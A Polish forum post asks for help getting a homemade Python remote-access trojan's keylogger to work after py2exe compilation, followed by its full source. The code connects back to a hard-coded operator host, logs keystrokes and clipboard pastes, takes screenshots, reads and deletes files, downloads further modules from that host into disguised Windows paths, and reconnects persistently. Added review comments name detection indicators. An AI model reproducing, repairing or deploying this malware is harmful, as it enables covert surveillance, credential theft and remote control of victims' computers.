Czesc interesuje sie bezpieczenstwem IT i napisalem takiego prostego RATa. Przechodze do sedna: gdy rat jest uruchomiany jako plik pythona to keylogger dziala, ale jak juz go skompiluje przez py2exe wtedy juz nie dziala, oto kod. Jakies rady? :
#!/usr/bin/python
from subprocess import call
from PIL import ImageGrab
import multiprocessing
import win32clipboard
from ctypes import *
import subprocess
import pythoncom
import platform
import requests
import getpass
import socket
import pyHook
import shutil
import time
import wget
import sys
import os
# NOTE(review): the listing below is a Windows remote-access trojan — a
# reverse-TCP command shell with a keyboard hook, clipboard capture,
# screenshots and file transfer. The comments added throughout describe
# observable behaviour and indicators (C2 address, file paths, beacon
# string) for analysis and detection purposes only.
# A `global` statement at module scope has no effect; it only changes name
# resolution inside a function. Nothing assigns command_execute_status at
# module level — each branch of command_execute() assigns a local of that name.
global command_execute_status
def run(x):
"""Execute *x* through the system shell (os.system) and discard its status.

Used by the ``run`` command via multiprocessing.Process so the shell call
runs in a child process and does not block the C2 loop. Returns nothing;
the exit status of the launched program is never reported over the socket.
"""
os.system(x)
def keylogger():
"""Install a global keyboard hook (pyHook) and append keystrokes to ``.logs``.

Runs forever inside pythoncom.PumpMessages(); the ``keylogger_start``
command launches it in a separate multiprocessing.Process. Output is the
relative file ``.logs`` in the process's current working directory, so its
location follows any earlier ``cd`` command. Windows only: relies on
ctypes.windll (user32/kernel32/psapi) plus the pyHook and pywin32 extensions.
"""
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
# Last window title seen by KeyStroke; a change triggers a new log header.
# NOTE(review): in this flattened listing it is unclear whether this name is
# local to keylogger() or module-level; KeyStroke below declares it `global`.
current_window = None
def get_current_process():
"""Append a "[ PID: n - exe - title ]" header for the foreground window to .logs."""
# get a handle to the foreground window
hwnd = user32.GetForegroundWindow()
# find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# store the current process ID
process_id = "%d" % pid.value
# grab the executable
executable = create_string_buffer("\x00" * 512)
# 0x400 | 0x10 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, the access
# GetModuleBaseName needs on the foreground process.
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# now read its window title (NUL-padded 512-byte buffer)
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512)
# write the header for the new foreground window
f = open(".logs", "ab")
f.write("\n[ PID: %s - %s - %s ]\n" % (process_id, executable.value, window_title.value))
f.close()
# close handles
# NOTE(review): hwnd is a window handle, not a kernel object handle, so
# CloseHandle on it is invalid; its return value is ignored here.
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def KeyStroke(event):
"""pyHook KeyDown callback: log printable keys, [PASTE] clipboard text, or [Key] names."""
global current_window
# check to see if target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# printable ASCII (33..126) is appended verbatim; space (32) falls through
# to the else branch and is logged by name
if event.Ascii > 32 and event.Ascii < 127:
f = open(".logs", "ab")
f.write(chr(event.Ascii))
f.close()
else:
# if [Ctrl-V], get the value on the clipboard
# added by Dan Frisch 2014
# NOTE(review): this branch is reached for the V key whenever the event
# carried no printable ASCII (e.g. with Ctrl held) — it does not check
# the Ctrl modifier itself. Clipboard text is read and logged each time.
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
f = open(".logs", "ab")
f.write("[PASTE] - %s" % (pasted_value))
f.close()
else:
# non-printable / special key: log pyHook's key name in brackets
f = open(".logs", "ab")
f.write("[%s]" % event.Key)
f.close()
# pass execution to next hook registered
return True
# create and register a hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# register the hook and execute forever (this call never returns normally)
kl.HookKeyboard()
pythoncom.PumpMessages()
def informations(client):
"""Collect a host/network fingerprint and send it to the C2 socket *client*.

Queries https://api.ipdata.co (no API key is passed) for the public IP,
ISP, country and coordinates, combines them with platform/user details,
stages the text in a file named ``.infos`` in the current directory,
sends that file's contents, then deletes it.

Any failure (network error, missing JSON key, file error) propagates
uncaught; in this program main()'s bare ``except`` then drops and
re-establishes the C2 connection.
"""
infos = requests.get('https://api.ipdata.co').json()
operating_system = platform.platform()
ip = infos["ip"]
isp = infos["organisation"]
country = infos["country_name"]
geo = str(infos["latitude"]) + ", " + str(infos["longitude"])
user = getpass.getuser()
arch = platform.architecture()[0]
# staging file in the CWD (follows any earlier `cd` command)
info = open(".infos", "ab")
info.write("MACHINE INFORMATIONS\n")
# Write machine information to the file
info.write("OS: " + "\t\t" + operating_system + "\n")
info.write("ARCHITECTURE:" + "\t" + arch + "\n")
info.write("USER:" + "\t\t" + user + "\n")
info.write("IP:" + "\t\t" + ip + "\n")
info.write("ISP:" + "\t\t" + isp + "\n")
info.write("GEO: " + "\t\t" + geo + "\n")
info.write("COUNTRY:" + "\t" + country + "\n")
info.close()
# read the staged report back, ship it, and remove the staging file
informations = open(".infos", "r")
client.send(informations.read())
informations.close()
os.remove(".infos")
def main():
"""Reverse-TCP C2 loop: connect to the hard-coded operator and serve commands.

Indicators: outbound plaintext TCP to 192.168.1.11:30 with the beacon
string "[+] Py_trojan ready." sent on connect. Commands are read in
1024-byte recv() chunks and passed to command_execute(). Any exception —
a dropped connection, an error raised inside a command handler, or the
SystemExit raised by the ``OFF`` command — is swallowed by the bare
``except``, followed by a 10 s sleep and a reconnect, so the loop never
terminates on its own.
"""
while 1:
try:
host = "192.168.1.11"
port = 30
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send("[+] Py_trojan ready.")
# serve commands until the socket or a handler raises
while 1:
command = client.recv(1024)
command_execute(command, client)
except:
# bare except: also catches SystemExit from "OFF" and KeyboardInterrupt
time.sleep(10)
continue
def command_execute(command, client):
"""Dispatch one operator *command* (raw string from recv) and reply on *client*.

Commands are matched by prefix only (``command[0:N] == "name"``), so the
order of this elif chain matters (e.g. "rmdir" is tested before "rm") and
any trailing text after the keyword is accepted. Arguments are taken
positionally after the keyword and one space. Replies are free-form:
"[+]" for success, "[-] <error>" for failure, or the requested data.

Branches without their own try/except (download_module, screenshot,
ifconfig, pwd, whoami) let exceptions propagate to main(), which reconnects.
"""
# exact match only for "ls": runs Windows `dir` through the shell
if command == "ls":
try:
command_execute_status = subprocess.check_output("dir", shell = True)
client.send(command_execute_status)
except subprocess.CalledProcessError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
# send the keystroke log (.logs in the current directory)
elif command[0:14] == "keylogger_dump":
try:
key_scan = open(".logs", "r")
client.send(key_scan.read())
except IOError as error:
client.send("[-]")
print(error)
# host fingerprint, see informations()
elif command[0:4] == "info":
informations(client)
# start the keyboard hook in a child process
elif command[0:15] == "keylogger_start":
try:
t = multiprocessing.Process(target=keylogger, args=())
t.start()
# NOTE(review): `clinet` is a misspelling of `client`; the NameError it
# raises is caught by the bare except below, so this command always
# replies "[-]" even though the child process has already been started.
clinet.send("[+]")
except:
client.send("[-]")
# mkdir <path>
elif command[0:5] == "mkdir":
try:
os.mkdir(command[6:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
# run <file>: launch via run() in a child process; "[+]" is sent
# immediately, without waiting for the program to finish
elif command[0:3] == "run":
prg = command[4:]
if os.path.isfile(prg) == True:
y = multiprocessing.Process(target=run, args=(prg,))
y.start()
client.send("[+]")
else:
client.send("[-] No such file: " + prg)
# cd <dir>: changes the whole process's CWD, which also moves where the
# relative .logs / .infos files are written
elif command[0:2] == "cd":
try:
os.chdir(command[3:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
# download_module <name>: fetch http://192.168.1.11/<name> over plaintext
# HTTP into a hard-coded staging directory (indicator). No error handling;
# the chdir is a side effect that persists for later commands.
elif command[0:15] == "download_module":
os.chdir("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\New_Core_System")
wget.download("http://192.168.1.11/" + command[16:])
client.send("[+]")
# rmdir <dir> — must precede "rm" because matching is by prefix
elif command[0:5] == "rmdir":
try:
os.rmdir(command[6:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
# rm <file>
elif command[0:2] == "rm":
try:
os.remove(command[3:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:3] == "pwd":
client.send(os.getcwd())
# cat <file>: PDFs are converted with a hard-coded pdf2txt.py path via a
# shell command string (indicator: C:\WINDOWS\PRoc_Sys_CoNFIG\system_files_config),
# staged in conwert_pdf.txt and deleted; other files are sent verbatim
elif command[0:3] == "cat":
try:
if ".pdf" in command[4:]:
os.system("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\system_files_config\\pdf2txt.py -o conwert_pdf.txt " + command[4:])
f = open("conwert_pdf.txt", "r")
client.send(f.read())
f.close()
os.remove("conwert_pdf.txt")
else:
file = open(command[4:], "r")
file_content = file.read()
command_execute_status = file_content
client.send(command_execute_status)
file.close()
except IOError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
# ifconfig → Windows `ipconfig`; a non-zero exit propagates to main()
elif command[0:8] == "ifconfig":
command_execute_status = subprocess.check_output("ipconfig", shell = True)
client.send(command_execute_status)
# shutdown: os.system returns a status rather than raising, so the
# OSError handler is not expected to fire in practice
elif command[0:8] == "shutdown":
try:
os.system("shutdown /s")
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:6] == "whoami":
command_execute_status = getpass.getuser()
client.send(command_execute_status)
# cp: two-round protocol — operator sends src, then dst, each in its own
# recv(). The final status string is assigned but never sent back.
elif command[0:2] == "cp":
try:
client.send("[*] Copy protocol open")
src = client.recv(1024)
client.send("[*] src download")
dst = client.recv(1024)
shutil.copy(src,dst)
command_execute_status = "[+]"
except:
command_execute_status = "[-]"
# screenshot: saved to a hard-coded path (indicator) and streamed back;
# the file handle is never closed
elif command[0:10] == "screenshot":
snapshot = ImageGrab.grab()
save_path = "C:\\WINDOWS\\PRoc_Sys_CoNFIG\\Sc_core\\screen.jpeg"
snapshot.save(save_path)
f = open("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\Sc_core\\screen.jpeg", "r")
client.send(f.read())
# OFF: closes the socket and raises SystemExit, which main()'s bare
# except catches — the implant sleeps 10 s and reconnects instead of exiting
elif command == "OFF":
client.close()
sys.exit()
else:
command_execute_status = "[-] Command not found"
client.send(command_execute_status)
# Entry point: start the reconnecting C2 loop. multiprocessing children
# spawned by command_execute() re-import this module, so the guard also
# keeps them from entering main().
if __name__ == "__main__":
main()